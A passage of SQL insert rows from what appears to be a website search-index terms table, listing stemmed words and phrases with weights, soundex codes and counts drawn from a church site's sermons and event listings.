(25154, 'instant', 'instant', 0, 0, 0.4667, 'I52353', 4, '*'),
(25167, 'is stronger', 'is stronger', 0, 1, 1.3667, 'I236526', 3, '*'),
(25168, 'is stronger than', 'is stronger than', 0, 1, 1.5333, 'I23652635', 3, '*'),
(25179, 'learn', 'learn', 0, 0, 0.3333, 'L650', 11, '*'),
(25180, 'learn to', 'learn to', 0, 1, 1.2667, 'L653', 7, '*'),
(25185, 'let your', 'let your', 0, 1, 1.2667, 'L360', 12, '*'),
(25187, 'listen', 'listen', 0, 0, 0.4, 'L235', 7, '*'),
(25188, 'listen to', 'listen to', 0, 1, 1.3, 'L2353', 4, '*'),
(25190, 'listening', 'listen', 0, 0, 0.6, 'L2352', 4, '*'),
(25191, 'listening to', 'listen to', 0, 1, 1.4, 'L23523', 4, '*'),
(25195, 'losing', 'lose', 0, 0, 0.4, 'L252', 3, '*'),
(25198, 'maintain', 'maintain', 0, 0, 0.5333, 'M350', 4, '*'),
(25201, 'majority', 'major', 0, 0, 0.5333, 'M263', 5, '*'),
(25202, 'majority of', 'major of', 0, 1, 1.3667, 'M2631', 4, '*'),
(25203, 'majority of christians', 'major of christians', 0, 1, 1.7333, 'M2631262352', 4, '*'),
(25204, 'malice', 'malic', 0, 0, 0.4, 'M420', 4, '*'),
(25207, 'matter', 'matter', 0, 0, 0.4, 'M360', 15, '*'),
(25210, 'men\'s', 'men', 0, 0, 0.3333, 'M200', 4, '*'),
(25218, 'ministry', 'ministri', 0, 0, 0.5333, 'M236', 16, '*'),
(25221, 'more time', 'more time', 0, 1, 1.3, 'M635', 4, '*'),
(25223, 'negative', 'neg', 0, 0, 0.5333, 'N231', 11, '*'),
(25224, 'negative passion', 'neg passion', 0, 1, 1.5333, 'N23125', 3, '*'),
(25232, 'note', 'note', 0, 0, 0.2667, 'N300', 8, '*'),
(25233, 'note that', 'note that', 0, 1, 1.3, 'N300', 3, '*'),
(25235, 'obedience', 'obedi', 0, 0, 0.6, 'O1352', 10, '*'),
(25236, 'obedience to', 'obedi to', 0, 1, 1.4, 'O13523', 4, '*'),
(25237, 'obedience to divine', 'obedi to divine', 0, 1, 1.6333, 'O1352315', 3, '*'),
(25238, 'of christians', 'of christians', 0, 1, 1.4333, 'O1262352', 6, '*'),
(25239, 'of christians are', 'of christians are', 0, 1, 1.5667, 'O12623526', 3, '*'),
(25251, 'of the spirit', 'of the spirit', 0, 1, 1.4333, 'O132163', 7, '*'),
(25252, 'of the word', 'of the word', 0, 1, 1.3667, 'O1363', 4, '*'),
(25253, 'offences', 'offenc', 0, 0, 0.5333, 'O152', 2, '*'),
(25258, 'operate', 'oper', 0, 0, 0.4667, 'O163', 7, '*'),
(25259, 'operate in', 'oper in', 0, 1, 1.3333, 'O1635', 5, '*'),
(25261, 'opinion', 'opinion', 0, 0, 0.4667, 'O150', 3, '*'),
(25266, 'passion', 'passion', 0, 0, 0.4667, 'P250', 3, '*'),
(25269, 'people that', 'peopl that', 0, 1, 1.3667, 'P430', 9, '*'),
(25271, 'person\'s', 'person', 0, 0, 0.5333, 'P6252', 5, '*'),
(25274, 'praise', 'prais', 0, 0, 0.4, 'P620', 3, '*'),
(25277, 'presence of god', 'presenc of god', 0, 1, 1.5, 'P6252123', 5, '*'),
(25278, 'prophets', 'prophet', 0, 0, 0.5333, 'P6132', 3, '*'),
(25279, 'prophets and', 'prophet and', 0, 1, 1.4, 'P613253', 3, '*'),
(25281, 'read the', 'read the', 0, 1, 1.2667, 'R300', 3, '*'),
(25286, 'reduce', 'reduc', 0, 0, 0.4, 'R320', 5, '*'),
(25292, 'regular', 'regular', 0, 0, 0.4667, 'R246', 5, '*'),
(25295, 'regularly', 'regularli', 0, 0, 0.6, 'R2464', 6, '*'),
(25300, 'rule', 'rule', 0, 0, 0.2667, 'R400', 5, '*'),
(25303, 'sensitivity', 'sensit', 0, 0, 0.7333, 'S52313', 4, '*'),
(25310, 'share', 'share', 0, 0, 0.3333, 'S600', 6, '*'),
(25311, 'share with', 'share with', 0, 1, 1.3333, 'S630', 3, '*'),
(25312, 'share with you', 'share with you', 0, 1, 1.4667, 'S630', 3, '*'),
(25315, 'sickness', 'sick', 0, 0, 0.5333, 'S520', 5, '*'),
(25332, 'spend', 'spend', 0, 0, 0.3333, 'S153', 7, '*'),
(25333, 'spend more', 'spend more', 0, 1, 1.3333, 'S15356', 3, '*'),
(25334, 'spend more time', 'spend more time', 0, 1, 1.5, 'S1535635', 3, '*'),
(25337, 'spirit regular', 'spirit regular', 0, 1, 1.4667, 'S1636246', 3, '*'),
(25341, 'spirit to', 'spirit to', 0, 1, 1.3, 'S163', 9, '*'),
(25343, 'spirits', 'spirit', 0, 0, 0.4667, 'S1632', 7, '*'),
(25358, 'stay', 'stai', 0, 0, 0.2667, 'S300', 11, '*'),
(25359, 'stay away', 'stai away', 0, 1, 1.3, 'S300', 4, '*'),
(25360, 'stay away from', 'stai away from', 0, 1, 1.4667, 'S3165', 4, '*'),
(25364, 'stop', 'stop', 0, 0, 0.2667, 'S310', 16, '*'),
(25367, 'strange', 'strang', 0, 0, 0.4667, 'S3652', 7, '*'),
(25373, 'stronger', 'stronger', 0, 0, 0.5333, 'S36526', 8, '*'),
(25374, 'stronger than', 'stronger than', 0, 1, 1.4333, 'S3652635', 4, '*'),
(25375, 'stronger than your', 'stronger than your', 0, 1, 1.6, 'S36526356', 3, '*'),
(25379, 'study the', 'studi the', 0, 1, 1.3, 'S300', 3, '*'),
(25380, 'study the bible', 'studi the bible', 0, 1, 1.5, 'S314', 3, '*'),
(25381, 'than', 'than', 0, 0, 0.2667, 'T500', 17, '*'),
(25382, 'than your', 'than your', 0, 1, 1.3, 'T560', 3, '*'),
(25389, 'the anointing', 'the anointing', 0, 1, 1.4333, 'T5352', 6, '*'),
(25394, 'the bible through', 'the bible through', 0, 1, 1.5667, 'T14362', 3, '*'),
(25398, 'the fruit', 'the fruit', 0, 1, 1.3, 'T163', 5, '*'),
(25399, 'the fruit of', 'the fruit of', 0, 1, 1.4, 'T1631', 5, '*'),
(25400, 'the holy spirit', 'the holy spirit', 0, 1, 1.5, 'T42163', 16, '*'),
(25406, 'the spirit', 'the spirit', 0, 1, 1.3333, 'T2163', 11, '*'),
(25408, 'the word', 'the word', 0, 1, 1.2667, 'T630', 11, '*'),
(25409, 'the word of', 'the word of', 0, 1, 1.3667, 'T631', 10, '*'),
(25412, 'them and', 'them and', 0, 1, 1.2667, 'T530', 11, '*'),
(25426, 'to change his', 'to change his', 0, 1, 1.4333, 'T252', 3, '*'),
(25427, 'to divine', 'to divine', 0, 1, 1.3, 'T150', 4, '*'),
(25429, 'to grow', 'to grow', 0, 1, 1.2333, 'T260', 5, '*'),
(25436, 'to share', 'to share', 0, 1, 1.2667, 'T260', 4, '*'),
(25437, 'to share with', 'to share with', 0, 1, 1.4333, 'T263', 3, '*'),
(25442, 'to walk', 'to walk', 0, 1, 1.2333, 'T420', 9, '*'),
(25448, 'towards', 'toward', 0, 0, 0.4667, 'T632', 6, '*'),
(25449, 'towards you', 'toward you', 0, 1, 1.3667, 'T632', 3, '*'),
(25453, 'until', 'until', 0, 0, 0.3333, 'U534', 12, '*'),
(25456, 'use', 'us', 0, 0, 0.2, 'U200', 10, '*'),
(25459, 'walk', 'walk', 0, 0, 0.2667, 'W420', 15, '*'),
(25460, 'walk with', 'walk with', 0, 1, 1.3, 'W423', 7, '*'),
(25462, 'want to share', 'want to share', 0, 1, 1.4333, 'W5326', 3, '*'),
(25463, 'ways', 'wai', 0, 0, 0.2667, 'W200', 10, '*'),
(25464, 'ways that', 'wai that', 0, 1, 1.3, 'W230', 4, '*'),
(25465, 'ways that you', 'wai that you', 0, 1, 1.4333, 'W230', 3, '*'),
(25466, 'ways to', 'wai to', 0, 1, 1.2333, 'W230', 4, '*'),
(25472, 'with the lord', 'with the lord', 0, 1, 1.4333, 'W3463', 6, '*'),
(25473, 'with them', 'with them', 0, 1, 1.3, 'W350', 8, '*'),
(25475, 'with you', 'with you', 0, 1, 1.2667, 'W300', 13, '*'),
(25477, 'word of', 'word of', 0, 1, 1.2333, 'W631', 11, '*'),
(25478, 'word of god', 'word of god', 0, 1, 1.3667, 'W63123', 9, '*'),
(25484, 'wrath', 'wrath', 0, 0, 0.3333, 'W630', 5, '*'),
(25487, 'wrong', 'wrong', 0, 0, 0.3333, 'W652', 14, '*'),
(25492, 'you are not', 'you are not', 0, 1, 1.3667, 'Y653', 9, '*'),
(25502, 'you should', 'you should', 0, 1, 1.3333, 'Y243', 12, '*'),
(25511, 'your confession', 'your confession', 0, 1, 1.5, 'Y625125', 4, '*'),
(25513, 'your conscience', 'your conscience', 0, 1, 1.5, 'Y625252', 6, '*'),
(25523, 'your spirit regular', 'your spirit regular', 0, 1, 1.6333, 'Y621636246', 3, '*'),
(25524, 'your spiritual', 'your spiritual', 0, 1, 1.4667, 'Y621634', 5, '*'),
(25526, 'your words', 'your words', 0, 1, 1.3333, 'Y632', 5, '*'),
(25910, '0', '0', 0, 0, 0.1, '', 23, '*'),
(25911, '4 of', '4 of', 0, 1, 1.1333, 'O100', 4, '*'),
(25912, '4 of our', '4 of our', 0, 1, 1.2667, 'O160', 4, '*'),
(25913, '6 itemid', '6 itemid', 0, 1, 1.2667, 'I353', 4, '*'),
(25914, '6 itemid 0', '6 itemid 0', 0, 1, 1.3333, 'I353', 4, '*'),
(25915, 'and prayer', 'and prayer', 0, 1, 1.3333, 'A5316', 4, '*'),
(25916, 'celebration', 'celebr', 0, 0, 0.7333, 'C41635', 4, '*'),
(25917, 'celebration service', 'celebr service', 0, 1, 1.6333, 'C416352612', 4, '*'),
(25918, 'celebration service step', 'celebr service step', 0, 1, 1.8, 'C41635261231', 4, '*'),
(25919, 'component jevents', 'compon jevents', 0, 1, 1.5667, 'C515321532', 23, '*'),
(25920, 'component jevents event', 'compon jevents event', 0, 1, 1.7667, 'C515321532153', 23, '*'),
(25921, 'event', 'event', 0, 0, 0.3333, 'E153', 25, '*'),
(25922, 'event 6', 'event 6', 0, 1, 1.2333, 'E153', 4, '*'),
(25923, 'event 6 itemid', 'event 6 itemid', 0, 1, 1.4667, 'E15353', 4, '*'),
(25924, 'fasting and', 'fast and', 0, 1, 1.3667, 'F235253', 5, '*'),
(25925, 'fasting and prayer', 'fast and prayer', 0, 1, 1.6, 'F23525316', 4, '*'),
(25926, 'itemid', 'itemid', 0, 0, 0.4, 'I353', 23, '*'),
(25927, 'itemid 0', 'itemid 0', 0, 1, 1.2667, 'I353', 23, '*'),
(25928, 'jevents', 'jevent', 0, 0, 0.4667, 'J1532', 23, '*'),
(25929, 'jevents event', 'jevent event', 0, 1, 1.4333, 'J1532153', 23, '*'),
(25930, 'jevents event 6', 'jevent event 6', 0, 1, 1.5, 'J1532153', 4, '*'),
(25931, 'loic', 'loic', 0, 0, 0.2667, 'L200', 19, '*'),
(25932, 'of our', 'of our', 0, 1, 1.2, 'O160', 8, '*'),
(25933, 'of our fasting', 'of our fasting', 0, 1, 1.4667, 'O1612352', 4, '*'),
(25934, 'our fasting', 'our fasting', 0, 1, 1.3667, 'O612352', 4, '*'),
(25935, 'our fasting and', 'our fasting and', 0, 1, 1.5, 'O61235253', 4, '*'),
(25936, 'service', 'servic', 0, 0, 0.4667, 'S612', 9, '*'),
(25937, 'service step', 'servic step', 0, 1, 1.4, 'S61231', 4, '*'),
(25938, 'service step 4', 'servic step 4', 0, 1, 1.4667, 'S61231', 4, '*'),
(25939, 'step 4', 'step 4', 0, 1, 1.2, 'S310', 5, '*'),
(25940, 'step 4 of', 'step 4 of', 0, 1, 1.3, 'S310', 4, '*'),
(25941, 'victory', 'victori', 0, 0, 0.4667, 'V236', 11, '*'),
(25942, 'victory celebration', 'victori celebration', 0, 1, 1.6333, 'V236241635', 4, '*'),
(25943, 'victory celebration service', 'victori celebration service', 0, 1, 1.9, 'V2362416352612', 4, '*'),
(25973, '2017', '2017', 0, 0, 0.4, '', 37, '*'),
(25974, '7 itemid', '7 itemid', 0, 1, 1.2667, 'I353', 7, '*'),
(25975, '7 itemid 0', '7 itemid 0', 0, 1, 1.3333, 'I353', 7, '*'),
(25976, 'annual', 'annual', 0, 0, 0.4, 'A540', 8, '*'),
(25977, 'annual school', 'annual school', 0, 1, 1.4333, 'A5424', 7, '*'),
(25978, 'annual school of', 'annual school of', 0, 1, 1.5333, 'A54241', 7, '*'),
(25979, 'asom', 'asom', 0, 0, 0.2667, 'A250', 7, '*'),
(25980, 'asom 2017', 'asom 2017', 0, 1, 1.3, 'A250', 7, '*'),
(25981, 'event 7', 'event 7', 0, 1, 1.2333, 'E153', 7, '*'),
(25982, 'event 7 itemid', 'event 7 itemid', 0, 1, 1.4667, 'E15353', 7, '*'),
(25983, 'jevents event 7', 'jevent event 7', 0, 1, 1.5, 'J1532153', 7, '*'),
(25984, 'of ministry', 'of ministry', 0, 1, 1.3667, 'O15236', 8, '*'),
(25985, 'school', 'school', 0, 0, 0.4, 'S400', 12, '*'),
(25986, 'school of', 'school of', 0, 1, 1.3, 'S410', 9, '*'),
(25987, 'school of ministry', 'school of ministry', 0, 1, 1.6, 'S415236', 7, '*'),
(25988, '8 itemid', '8 itemid', 0, 1, 1.2667, 'I353', 4, '*'),
(25989, '8 itemid 0', '8 itemid 0', 0, 1, 1.3333, 'I353', 4, '*'),
(25990, 'all nations', 'all nations', 0, 1, 1.3667, 'A45352', 4, '*'),
(25991, 'all nations women', 'all nations women', 0, 1, 1.5667, 'A453525', 4, '*'),
(25992, 'congress', 'congress', 0, 0, 0.5333, 'C5262', 4, '*'),
(25993, 'event 8', 'event 8', 0, 1, 1.2333, 'E153', 4, '*'),
(25994, 'event 8 itemid', 'event 8 itemid', 0, 1, 1.4667, 'E15353', 4, '*'),
(25995, 'jevents event 8', 'jevent event 8', 0, 1, 1.5, 'J1532153', 4, '*'),
(25996, 'nations', 'nation', 0, 0, 0.4667, 'N352', 7, '*'),
(25997, 'nations women', 'nation women', 0, 1, 1.4333, 'N3525', 4, '*'),
(25998, 'nations women congress', 'nation women congress', 0, 1, 1.7333, 'N352525262', 4, '*'),
(25999, 'women', 'women', 0, 0, 0.3333, 'W500', 10, '*'),
(26000, 'women congress', 'women congress', 0, 1, 1.4667, 'W525262', 4, '*'),
(26003, '9 itemid', '9 itemid', 0, 1, 1.2667, 'I353', 2, '*'),
(26004, '9 itemid 0', '9 itemid 0', 0, 1, 1.3333, 'I353', 2, '*'),
(26005, 'easter', 'easter', 0, 0, 0.4, 'E236', 3, '*'),
(26006, 'easter faith', 'easter faith', 0, 1, 1.4, 'E23613', 3, '*'),
(26007, 'easter faith seminar', 'easter faith seminar', 0, 1, 1.6667, 'E23613256', 3, '*'),
(26008, 'event 9', 'event 9', 0, 1, 1.2333, 'E153', 2, '*'),
(26009, 'event 9 itemid', 'event 9 itemid', 0, 1, 1.4667, 'E15353', 2, '*'),
(26010, 'faith seminar', 'faith seminar', 0, 1, 1.4333, 'F3256', 3, '*'),
(26011, 'jevents event 9', 'jevent event 9', 0, 1, 1.5, 'J1532153', 2, '*'),
(26012, 'seminar', 'seminar', 0, 0, 0.4667, 'S560', 3, '*'),
(26018, '10 itemid', '10 itemid', 0, 1, 1.3, 'I353', 2, '*'),
(26019, '10 itemid 0', '10 itemid 0', 0, 1, 1.3667, 'I353', 2, '*'),
(26020, 'anniversary', 'anniversari', 0, 0, 0.7333, 'A51626', 2, '*'),
(26021, 'anniversary weekend', 'anniversari weekend', 0, 1, 1.6333, 'A51626253', 2, '*'),
(26022, 'anniversary weekend daddy\'s', 'anniversari weekend daddy', 0, 1, 1.9, 'A516262532', 2, '*'),
(26023, 'birthday', 'birthdai', 0, 0, 0.5333, 'B630', 2, '*'),
(26024, 'daddy\'s', 'daddi', 0, 0, 0.4667, 'D200', 2, '*'),
(26025, 'daddy\'s birthday', 'daddi birthday', 0, 1, 1.5333, 'D2163', 2, '*'),
(26026, 'event 10', 'event 10', 0, 1, 1.2667, 'E153', 2, '*'),
(26027, 'event 10 itemid', 'event 10 itemid', 0, 1, 1.5, 'E15353', 2, '*'),
(26028, 'jevents event 10', 'jevent event 10', 0, 1, 1.5333, 'J1532153', 2, '*'),
(26029, 'special', 'special', 0, 0, 0.4667, 'S124', 7, '*'),
(26030, 'special anniversary', 'special anniversary', 0, 1, 1.6333, 'S12451626', 2, '*'),
(26031, 'special anniversary weekend', 'special anniversary weekend', 0, 1, 1.9, 'S12451626253', 2, '*'),
(26032, 'weekend', 'weekend', 0, 0, 0.4667, 'W253', 3, '*'),
(26033, 'weekend daddy\'s', 'weekend daddy', 0, 1, 1.5, 'W2532', 2, '*'),
(26034, 'weekend daddy\'s birthday', 'weekend daddy birthday', 0, 1, 1.8, 'W2532163', 2, '*'),
(26049, '11', '11', 0, 0, 0.2, '', 13, '*'),
(26050, '11 itemid', '11 itemid', 0, 1, 1.3, 'I353', 2, '*'),
(26051, '11 itemid 0', '11 itemid 0', 0, 1, 1.3667, 'I353', 2, '*'),
(26052, 'event 11', 'event 11', 0, 1, 1.2667, 'E153', 2, '*'),
(26053, 'event 11 itemid', 'event 11 itemid', 0, 1, 1.5, 'E15353', 2, '*'),
(26054, 'jevents event 11', 'jevent event 11', 0, 1, 1.5333, 'J1532153', 2, '*'),
(26055, 'of the calling', 'of the calling', 0, 1, 1.4667, 'O132452', 6, '*'),
(26056, 'school of the', 'school of the', 0, 1, 1.4333, 'S413', 2, '*'),
(26064, '12 itemid', '12 itemid', 0, 1, 1.3, 'I353', 2, '*'),
(26065, '12 itemid 0', '12 itemid 0', 0, 1, 1.3667, 'I353', 2, '*'),
(26066, 'convention', 'convent', 0, 0, 0.6667, 'C51535', 3, '*'),
(26067, 'event 12', 'event 12', 0, 1, 1.2667, 'E153', 2, '*'),
(26068, 'event 12 itemid', 'event 12 itemid', 0, 1, 1.5, 'E15353', 2, '*'),
(26069, 'jevents event 12', 'jevent event 12', 0, 1, 1.5333, 'J1532153', 2, '*'),
(26070, 'men\'s convention', 'men convention', 0, 1, 1.5333, 'M251535', 2, '*'),
(28129, '27', '27', 0, 0, 0.2, '', 4, '*'),
(28229, 'be a', 'be a', 0, 1, 1.1333, 'B000', 25, '*'),
(28238, 'beginning', 'begin', 0, 0, 0.6, 'B252', 2, '*'),
(28239, 'beginning of', 'begin of', 0, 1, 1.4, 'B2521', 2, '*'),
(28284, 'condition', 'condit', 0, 0, 0.6, 'C535', 4, '*'),
(28291, 'could', 'could', 0, 0, 0.3333, 'C430', 14, '*'),
(28292, 'could be', 'could be', 0, 1, 1.2667, 'C431', 4, '*'),
(28293, 'could be a', 'could be a', 0, 1, 1.3333, 'C431', 2, '*'),
(28388, 'ground', 'ground', 0, 0, 0.4, 'G653', 4, '*'),
(28412, 'harvest', 'harvest', 0, 0, 0.4667, 'H6123', 4, '*'),
(28463, 'in god', 'in god', 0, 1, 1.2, 'I523', 9, '*'),
(28505, 'it could', 'it could', 0, 1, 1.2667, 'I3243', 2, '*'),
(28506, 'it could be', 'it could be', 0, 1, 1.3667, 'I32431', 2, '*'),
(28509, 'it\'s', 'it', 0, 0, 0.2667, 'I320', 10, '*'),
(28538, 'labor', 'labor', 0, 0, 0.3333, 'L160', 3, '*'),
(28619, 'names', 'name', 0, 0, 0.3333, 'N200', 6, '*'),
(28659, 'on a', 'on a', 0, 1, 1.1333, 'O500', 6, '*'),
(28666, 'or give', 'or give', 0, 1, 1.2333, 'O621', 2, '*'),
(28761, 'proverbs', 'proverb', 0, 0, 0.5333, 'P61612', 8, '*'),
(28815, 'sow', 'sow', 0, 0, 0.2, 'S000', 4, '*'),
(28856, 'the beginning', 'the beginning', 0, 1, 1.4333, 'T1252', 2, '*'),
(28857, 'the beginning of', 'the beginning of', 0, 1, 1.5333, 'T12521', 2, '*'),
(28870, 'the lord and', 'the lord and', 0, 1, 1.4, 'T46353', 6, '*'),
(28975, 'will be', 'will be', 0, 1, 1.2333, 'W410', 24, '*'),
(29029, 'your place', 'your place', 0, 1, 1.3333, 'Y6142', 3, '*'),
(31201, '22', '22', 0, 0, 0.2, '', 10, '*'),
(31280, 'a way', 'a way', 0, 1, 1.1667, 'A000', 3, '*'),
(31335, 'and begin', 'and begin', 0, 1, 1.3, 'A53125', 2, '*'),
(31336, 'and begin to', 'and begin to', 0, 1, 1.4, 'A531253', 2, '*'),
(31378, 'and there', 'and there', 0, 1, 1.3, 'A536', 8, '*'),
(31379, 'and there is', 'and there is', 0, 1, 1.4, 'A5362', 4, '*'),
(31406, 'are three', 'ar three', 0, 1, 1.3, 'A636', 3, '*'),
(31418, 'at the', 'at the', 0, 1, 1.2, 'A300', 21, '*'),
(31498, 'bring', 'bring', 0, 0, 0.3333, 'B652', 16, '*'),
(31638, 'crucial', 'crucial', 0, 0, 0.4667, 'C624', 2, '*'),
(31652, 'details', 'detail', 0, 0, 0.4667, 'D420', 3, '*'),
(31690, 'do it', 'do it', 0, 1, 1.1667, 'D000', 8, '*'),
(31723, 'draws', 'draw', 0, 0, 0.3333, 'D620', 2, '*'),
(31777, 'ever', 'ever', 0, 0, 0.2667, 'E160', 5, '*'),
(31788, 'example', 'exampl', 0, 0, 0.4667, 'E2514', 6, '*'),
(31803, 'expects', 'expect', 0, 0, 0.4667, 'E21232', 3, '*'),
(31855, 'for his', 'for his', 0, 1, 1.2333, 'F620', 5, '*'),
(31920, 'give you', 'give you', 0, 1, 1.2667, 'G100', 5, '*'),
(31922, 'give you the', 'give you the', 0, 1, 1.4, 'G130', 2, '*'),
(31999, 'have the', 'have the', 0, 1, 1.2667, 'H130', 7, '*'),
(32020, 'house', 'hous', 0, 0, 0.3333, 'H200', 13, '*'),
(32071, 'in the house', 'in the house', 0, 1, 1.4, 'I532', 4, '*'),
(32119, 'is crucial', 'is crucial', 0, 1, 1.3333, 'I2624', 2, '*'),
(32136, 'is that', 'is that', 0, 1, 1.2333, 'I230', 8, '*'),
(32140, 'is your', 'is your', 0, 1, 1.2333, 'I260', 15, '*'),
(32173, 'kingdom', 'kingdom', 0, 0, 0.4667, 'K5235', 15, '*'),
(32186, 'knows', 'know', 0, 0, 0.3333, 'K520', 10, '*'),
(32191, 'last', 'last', 0, 0, 0.2667, 'L230', 9, '*'),
(32228, 'life there', 'life there', 0, 1, 1.3333, 'L136', 3, '*'),
(32229, 'life there is', 'life there is', 0, 1, 1.4333, 'L1362', 2, '*'),
(32232, 'lifeoasis', 'lifeoasi', 0, 0, 0.6, 'L120', 32, '*'),
(32274, 'man of', 'man of', 0, 1, 1.2, 'M100', 5, '*'),
(32470, 'place in', 'place in', 0, 1, 1.2667, 'P425', 3, '*'),
(32520, 'put', 'put', 0, 0, 0.2, 'P300', 15, '*'),
(32565, 'say', 'sai', 0, 0, 0.2, 'S000', 9, '*'),
(32619, 'so doing', 'so doing', 0, 1, 1.2667, 'S352', 4, '*'),
(32659, 'standing', 'stand', 0, 0, 0.5333, 'S35352', 3, '*'),
(32662, 'start a', 'start a', 0, 1, 1.2333, 'S363', 5, '*'),
(32689, 'such', 'such', 0, 0, 0.2667, 'S000', 20, '*'),
(32709, 'take the', 'take the', 0, 1, 1.2667, 'T230', 8, '*'),
(32722, 'text', 'text', 0, 0, 0.2667, 'T230', 7, '*'),
(32738, 'that will', 'that will', 0, 1, 1.3, 'T400', 17, '*'),
(32777, 'the following', 'the following', 0, 1, 1.4333, 'T1452', 8, '*'),
(32784, 'the house', 'the house', 0, 1, 1.3, 'T200', 4, '*'),
(32789, 'the kingdom', 'the kingdom', 0, 1, 1.3667, 'T25235', 9, '*'),
(32815, 'the things', 'the things', 0, 1, 1.3333, 'T520', 7, '*'),
(32826, 'there are three', 'there are three', 0, 1, 1.5, 'T636', 2, '*'),
(32828, 'these are', 'these are', 0, 1, 1.3, 'T260', 5, '*'),
(32836, 'things you', 'thing you', 0, 1, 1.3333, 'T520', 4, '*'),
(32850, 'three', 'three', 0, 0, 0.3333, 'T600', 7, '*'),
(32896, 'to take', 'to take', 0, 1, 1.2333, 'T200', 12, '*'),
(32928, 'upon your', 'upon your', 0, 1, 1.3, 'U156', 3, '*'),
(32969, 'what will', 'what will', 0, 1, 1.3, 'W340', 2, '*'),
(32977, 'while you', 'while you', 0, 1, 1.3, 'W400', 3, '*'),
(32978, 'while you are', 'while you are', 0, 1, 1.4333, 'W460', 3, '*'),
(33077, 'you the', 'you the', 0, 1, 1.2333, 'Y300', 7, '*'),
(33112, 'your first', 'your first', 0, 1, 1.3333, 'Y61623', 4, '*'),
(36303, 'default', 'default', 0, 0, 0.4667, 'D143', 4, '*'),
(36310, '2 samuel', '2 samuel', 0, 1, 1.2667, 'S540', 2, '*'),
(36320, '9 who', '9 who', 0, 1, 1.1667, 'W000', 2, '*'),
(36324, 'a condition', 'a condition', 0, 1, 1.3667, 'A2535', 2, '*'),
(36329, 'a great', 'a great', 0, 1, 1.2333, 'A263', 5, '*'),
(36335, 'a man', 'a man', 0, 1, 1.1667, 'A500', 21, '*'),
(36336, 'a man who', 'a man who', 0, 1, 1.3, 'A500', 2, '*'),
(36339, 'a place', 'a place', 0, 1, 1.2333, 'A142', 8, '*'),
(36343, 'a state', 'a state', 0, 1, 1.2333, 'A230', 2, '*'),
(36346, 'above', 'abov', 0, 0, 0.3333, 'A100', 12, '*'),
(36349, 'absalom', 'absalom', 0, 0, 0.4667, 'A1245', 2, '*'),
(36352, 'adam', 'adam', 0, 0, 0.2667, 'A350', 5, '*'),
(36353, 'adam and', 'adam and', 0, 1, 1.2667, 'A353', 3, '*'),
(36354, 'adam and eve', 'adam and eve', 0, 1, 1.4, 'A3531', 3, '*'),
(36358, 'against israel', 'against israel', 0, 1, 1.4667, 'A2523264', 2, '*'),
(36371, 'and eve', 'and eve', 0, 1, 1.2333, 'A531', 3, '*'),
(36375, 'and he', 'and he', 0, 1, 1.2, 'A530', 17, '*'),
(36380, 'and remain', 'and remain', 0, 1, 1.3333, 'A5365', 4, '*'),
(36381, 'and remain there', 'and remain there', 0, 1, 1.5333, 'A536536', 3, '*'),
(36382, 'and see', 'and see', 0, 1, 1.2333, 'A532', 4, '*'),
(36387, 'and stay', 'and stay', 0, 1, 1.2667, 'A5323', 2, '*'),
(36390, 'and to', 'and to', 0, 1, 1.2, 'A530', 7, '*'),
(36394, 'and win', 'and win', 0, 1, 1.2333, 'A535', 29, '*'),
(36395, 'and win with', 'and win with', 0, 1, 1.4, 'A5353', 28, '*'),
(36398, 'angels', 'angel', 0, 0, 0.4, 'A5242', 4, '*'),
(36401, 'areogun', 'areogun', 0, 0, 0.4667, 'A625', 40, '*'),
(36402, 'as we', 'as we', 0, 1, 1.1667, 'A200', 6, '*'),
(36403, 'as we move', 'as we move', 0, 1, 1.3333, 'A251', 2, '*'),
(36404, 'assignments', 'assign', 0, 0, 0.7333, 'A2532', 5, '*'),
(36407, 'away with', 'awai with', 0, 1, 1.3, 'A300', 3, '*'),
(36408, 'away with the', 'awai with the', 0, 1, 1.4333, 'A300', 2, '*'),
(36409, 'back', 'back', 0, 0, 0.2667, 'B200', 9, '*'),
(36412, 'battles', 'battl', 0, 0, 0.4667, 'B342', 3, '*'),
(36413, 'battles of', 'battl of', 0, 1, 1.3333, 'B3421', 2, '*'),
(36424, 'being a', 'be a', 0, 1, 1.2333, 'B520', 3, '*'),
(36428, 'beloved the', 'belov the', 0, 1, 1.3667, 'B413', 3, '*'),
(36433, 'bible says in', 'bibl says in', 0, 1, 1.4333, 'B425', 3, '*'),
(36437, 'book', 'book', 0, 0, 0.2667, 'B200', 4, '*'),
(36438, 'book of', 'book of', 0, 1, 1.2333, 'B210', 3, '*'),
(36441, 'but he', 'but he', 0, 1, 1.2, 'B300', 8, '*'),
(36443, 'but you', 'but you', 0, 1, 1.2333, 'B300', 10, '*'),
(36444, 'but you must', 'but you must', 0, 1, 1.4, 'B3523', 4, '*'),
(36450, 'carried', 'carri', 0, 0, 0.4667, 'C630', 3, '*'),
(36451, 'carried away', 'carri away', 0, 1, 1.4, 'C630', 2, '*'),
(36452, 'carried away with', 'carri away with', 0, 1, 1.5667, 'C630', 2, '*'),
(36453, 'challenges', 'challeng', 0, 0, 0.6667, 'C452', 3, '*'),
(36458, 'compromise', 'compromis', 0, 0, 0.6667, 'C51652', 3, '*'),
(36461, 'compromising', 'compromis', 0, 0, 0.8, 'C5165252', 2, '*'),
(36467, 'condition of', 'condit of', 0, 1, 1.4, 'C5351', 2, '*'),
(36470, 'contrary', 'contrari', 0, 0, 0.5333, 'C536', 2, '*'),
(36484, 'determine', 'determin', 0, 0, 0.6, 'D650', 10, '*'),
(36495, 'don\'t give', 'don give', 0, 1, 1.3333, 'D5321', 2, '*'),
(36500, 'don\'t try', 'don try', 0, 1, 1.3, 'D536', 2, '*'),
(36501, 'don\'t try to', 'don try to', 0, 1, 1.4, 'D5363', 2, '*'),
(36502, 'encourage you', 'encourag you', 0, 1, 1.4333, 'E5262', 3, '*'),
(36504, 'enemy', 'enemi', 0, 0, 0.3333, 'E500', 9, '*'),
(36507, 'eternal', 'etern', 0, 0, 0.4667, 'E3654', 3, '*'),
(36510, 'eve', 'ev', 0, 0, 0.2, 'E100', 4, '*'),
(36513, 'even if', 'even if', 0, 1, 1.2333, 'E151', 2, '*'),
(36524, 'fathers', 'father', 0, 0, 0.4667, 'F362', 3, '*'),
(36530, 'fled', 'fled', 0, 0, 0.2667, 'F430', 2, '*'),
(36541, 'for the lord', 'for the lord', 0, 1, 1.4, 'F63463', 2, '*'),
(36552, 'give up', 'give up', 0, 1, 1.2333, 'G100', 2, '*'),
(36554, 'glorious', 'gloriou', 0, 0, 0.5333, 'G462', 4, '*'),
(36557, 'go and', 'go and', 0, 1, 1.2, 'G530', 31, '*'),
